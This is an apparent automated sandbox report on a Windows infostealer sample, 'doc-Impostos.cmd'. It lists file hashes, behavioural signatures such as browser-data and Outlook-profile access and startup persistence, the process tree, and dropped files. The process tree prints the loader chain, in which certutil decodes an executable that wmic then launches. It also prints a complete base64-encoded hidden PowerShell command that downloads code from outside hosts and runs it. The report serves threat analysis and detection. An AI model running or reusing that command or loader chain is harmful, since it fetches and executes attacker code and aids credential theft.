Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
02/01/2023, 13:05
Static task
static1
Behavioral task
behavioral1
Sample
doc-Impostos.cmd
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
doc-Impostos.cmd
Resource
win10v2004-20221111-en
General
-
Target
doc-Impostos.cmd
-
Size
1.4MB
-
MD5
c76daaa1b0caaf00f820581c3d848581
-
SHA1
279e002d57cf3dfa1faa4a5d22d77c6b29fe9f6c
-
SHA256
7ff62cc43a03065fe50371080e849b0779cb0f1ec308b24eca6b5ce1bf6b6ad3
-
SHA512
01f8a45568d0b508d09609e0659bb332a3509944039208bfc9ca18f66a63a179a7119aad54d92a514cb3962d3801459f3a527984a2e4c4c6b30063e1a55ec471
-
SSDEEP
24576:0b0FVefPot0YZeHsCrhGbfAjespJNj5e1byXc628L:to45oeuIQtL
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 10 864 powershell.exe 12 864 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 992 whitaker.exe -
Deletes itself 1 IoCs
pid Process 1712 cmd.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverAudio.lnk whitaker.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverAudio.lnk powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 992 whitaker.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 whitaker.exe Key opened \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 whitaker.exe Key opened \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 whitaker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
pid Process 968 timeout.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:{impersonationLevel=impersonate}!\root\cimv2 whitaker.exe -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 8 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 5 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 7 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 472 powershell.exe 864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeDebugPrivilege 472 powershell.exe Token: SeIncreaseQuotaPrivilege 1264 WMIC.exe Token: SeSecurityPrivilege 1264 WMIC.exe Token: SeTakeOwnershipPrivilege 1264 WMIC.exe Token: SeLoadDriverPrivilege 1264 WMIC.exe Token: SeSystemProfilePrivilege 1264 WMIC.exe Token: SeSystemtimePrivilege 1264 WMIC.exe Token: SeProfSingleProcessPrivilege 1264 WMIC.exe Token: SeIncBasePriorityPrivilege 1264 WMIC.exe Token: SeCreatePagefilePrivilege 1264 WMIC.exe Token: SeBackupPrivilege 1264 WMIC.exe Token: SeRestorePrivilege 1264 WMIC.exe Token: SeShutdownPrivilege 1264 WMIC.exe Token: SeDebugPrivilege 1264 WMIC.exe Token: SeSystemEnvironmentPrivilege 1264 WMIC.exe Token: SeRemoteShutdownPrivilege 1264 WMIC.exe Token: SeUndockPrivilege 1264 WMIC.exe Token: SeManageVolumePrivilege 1264 WMIC.exe Token: 33 1264 WMIC.exe Token: 34 1264 WMIC.exe Token: 35 1264 WMIC.exe Token: SeIncreaseQuotaPrivilege 1264 WMIC.exe Token: SeSecurityPrivilege 1264 WMIC.exe Token: SeTakeOwnershipPrivilege 1264 WMIC.exe Token: SeLoadDriverPrivilege 1264 WMIC.exe Token: SeSystemProfilePrivilege 1264 WMIC.exe Token: SeSystemtimePrivilege 1264 WMIC.exe Token: SeProfSingleProcessPrivilege 1264 WMIC.exe Token: SeIncBasePriorityPrivilege 1264 WMIC.exe Token: SeCreatePagefilePrivilege 1264 WMIC.exe Token: SeBackupPrivilege 1264 WMIC.exe Token: SeRestorePrivilege 1264 WMIC.exe Token: SeShutdownPrivilege 1264 WMIC.exe Token: SeDebugPrivilege 1264 WMIC.exe Token: SeSystemEnvironmentPrivilege 1264 WMIC.exe Token: SeRemoteShutdownPrivilege 1264 WMIC.exe Token: SeUndockPrivilege 1264 WMIC.exe Token: SeManageVolumePrivilege 1264 WMIC.exe Token: 33 1264 WMIC.exe Token: 34 1264 WMIC.exe Token: 35 1264 WMIC.exe Token: SeDebugPrivilege 864 powershell.exe -
Suspicious use of FindShellTrayWindow 19 IoCs
pid Process 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe 992 whitaker.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 2012 wrote to memory of 1712 2012 cmd.exe 30 PID 2012 wrote to memory of 1712 2012 cmd.exe 30 PID 2012 wrote to memory of 1712 2012 cmd.exe 30 PID 1712 wrote to memory of 1556 1712 cmd.exe 31 PID 1712 wrote to memory of 1556 1712 cmd.exe 31 PID 1712 wrote to memory of 1556 1712 cmd.exe 31 PID 1712 wrote to memory of 472 1712 cmd.exe 32 PID 1712 wrote to memory of 472 1712 cmd.exe 32 PID 1712 wrote to memory of 472 1712 cmd.exe 32 PID 1712 wrote to memory of 1128 1712 cmd.exe 33 PID 1712 wrote to memory of 1128 1712 cmd.exe 33 PID 1712 wrote to memory of 1128 1712 cmd.exe 33 PID 1712 wrote to memory of 2000 1712 cmd.exe 34 PID 1712 wrote to memory of 2000 1712 cmd.exe 34 PID 1712 wrote to memory of 2000 1712 cmd.exe 34 PID 1712 wrote to memory of 1264 1712 cmd.exe 35 PID 1712 wrote to memory of 1264 1712 cmd.exe 35 PID 1712 wrote to memory of 1264 1712 cmd.exe 35 PID 1712 wrote to memory of 968 1712 cmd.exe 38 PID 1712 wrote to memory of 968 1712 cmd.exe 38 PID 1712 wrote to memory of 968 1712 cmd.exe 38 PID 992 wrote to memory of 864 992 whitaker.exe 41 PID 992 wrote to memory of 864 992 whitaker.exe 41 PID 992 wrote to memory of 864 992 whitaker.exe 41 PID 992 wrote to memory of 864 992 whitaker.exe 41 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 whitaker.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 whitaker.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\doc-Impostos.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\doc-Impostos.cmd"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\system32\more.commore +5 C:\Users\Admin\AppData\Local\Temp\doc-Impostos.cmd3⤵PID:1556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(gc ~~) -replace '>', '' | Out-File -encoding ASCII ~~"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:472
-
-
C:\Windows\system32\certutil.execertutil -decode -f ~~ "C:\Users\Admin\AppData\Roaming\glover\exe\vmiddleton\whitaker.exe"3⤵PID:1128
-
-
C:\Windows\system32\certutil.execertutil -decode -f C:\Users\Admin\AppData\Local\Temp\doc-Impostos.cmd "C:\Users\Admin\AppData\Roaming\glover\a3x\wrenn\doc-Impostos.a3x"3⤵PID:2000
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process call create '"C:\Users\Admin\AppData\Roaming\glover\exe\vmiddleton\whitaker.exe" "C:\Users\Admin\AppData\Roaming\glover\a3x\wrenn\doc-Impostos.a3x" ""' ,C:\Users\Admin\AppData\Local\Temp\3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
C:\Windows\system32\timeout.exetimeout /T 53⤵
- Delays execution with timeout.exe
PID:968
-
-
-
C:\Users\Admin\AppData\Roaming\glover\exe\vmiddleton\whitaker.exe"C:\Users\Admin\AppData\Roaming\glover\exe\vmiddleton\whitaker.exe" "C:\Users\Admin\AppData\Roaming\glover\a3x\wrenn\doc-Impostos.a3x" ""1⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- NTFS ADS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded JABLAFUAcQBMAFAAZAByAFAAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAYwBvAHcAawBvAHYALgB4AHkAegAvAHMAeQBzAC8APwBoAD0ANAAwAEQANgAwADYAMwAxACIALAAgACIAaAB0AHQAcAA6AC8ALwBtAG8AcwBjAG8AdwBrAG8AdgAuAGEAdAAvAHMAeQBzAC8APwBoAD0ANAAwAEQANgAwADYAMwAxACIAKQA7AGYAbwByACgAOwA7ACkAewBmAG8AcgBlAGEAYwBoACgAJABCAEsAcABDAFEAIABpAG4AIAAkAEsAVQBxAEwAUABkAHIAUAApAHsAdAByAHkAewAkAGcATABhAEkAbQBHAFcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACQAQgBLAHAAQwBRACkAOwAkAHoAQwBDAG8AdABOAEYAIAA9ACAAJABnAEwAYQBJAG0ARwBXAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAZwBMAGEASQBtAEcAVwBzAHQAcgBlAGEAbQAgAD0AIAAkAHoAQwBDAG8AdABOAEYALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAUwB0AHIAZQBhAG0AKAApADsAJABzAHQAcgBlAGEAbQAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAZwBMAGEASQBtAEcAVwBzAHQAcgBlAGEAbQA7ACQAeABPAFoAYwBLAGsATwAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAHgATwBaAGMASwBrAE8AOwB0AHIAeQB7AEkARQBYACAAJAB4AE8AWgBjAEsAawBPADsAfQBjAGEAdABjAGgAewB9AFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAIgA2ADAAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADYAMAA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAGUAIgA7AH0AfQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAOwB9AA==2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5f048ee2c96103015e19d9d4e41a1adbc
SHA1c531744376c0a64329b5a9c7e35765b3eb03a60b
SHA2564d10b7047b6334ea5d9ec2f5db44583b18d4c85de584323e425eb47360acc43c
SHA512ca2570f7f9f60457fc0a8133118d609ab093db99d4fc86f915488215abf1adc7f28ac3b2388d6192d2b1b42c931676fd39785894e3edb771b77979006f6bcb16
-
Filesize
1.3MB
MD5fb8da432cd6b0e8117c141688b17bda4
SHA182bc9bb64e960fda81cb0900b0dc3d24fea77325
SHA256f532a1653ef1d202b14cb7d795efc331b6d985681a9ab8d442cef404fc451f5a
SHA512f9738096b7aa56f655be0aef3e00bc10b6f1f9f6d622d61fabb2efce264bb6c6ba361183d5e773afb043f8d69a89c9341cbaaddd6aeccff57826abeed9087f63
-
Filesize
4KB
MD532dabc97be5028fb6da5786fae16d636
SHA15577d5041835996aff43dc3afe16a74a1278a9bf
SHA256b1034dff677d59028bd89571c2bbf772dc31af29e76804e9763c3cb5cdf09126
SHA512ed3ea06f629cdeedbf8db6a3623449001fcca8e89c38dcf8d301158f97b3ded92b303763cfe3c84bdaee0e9550b42829842ff7098385e444e70a2785963f6adf
-
Filesize
115KB
MD5bfb28cda03f6b0e1df19176614772d75
SHA1a64ef88d61e7dfae057f161cfb57a762c8afc9db
SHA2565a679cab55d3f050e304ab0cf2ee28ce8e4f70cc355bb349ed97aa5d6ad9a2e3
SHA512333f1538045a7a50692041208464526e0feb825b75469bb16ca4ebf3b0a1cc05720f9b0ef07edc69fede52f907e1fcc1945183a881a85825e0041d0bbac747b3
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
858KB
MD5c7719f774bb859240eb6dfa91a1f10be
SHA1be1461e770333eb13e0fe66d378e3fac4f1112b5
SHA256b3ce811fb696b94f9117ee7fe725ae6b907d695636beceeb1672d5d5eeb81df4
SHA5128a561e927a7a65f5211c76b488bed2a3cc0525ecd9775d25e1863b52ff532349c125b76a51eb63ea2e4479a567e8fac6b8ae38b7fd1970bad2556befe9e3b529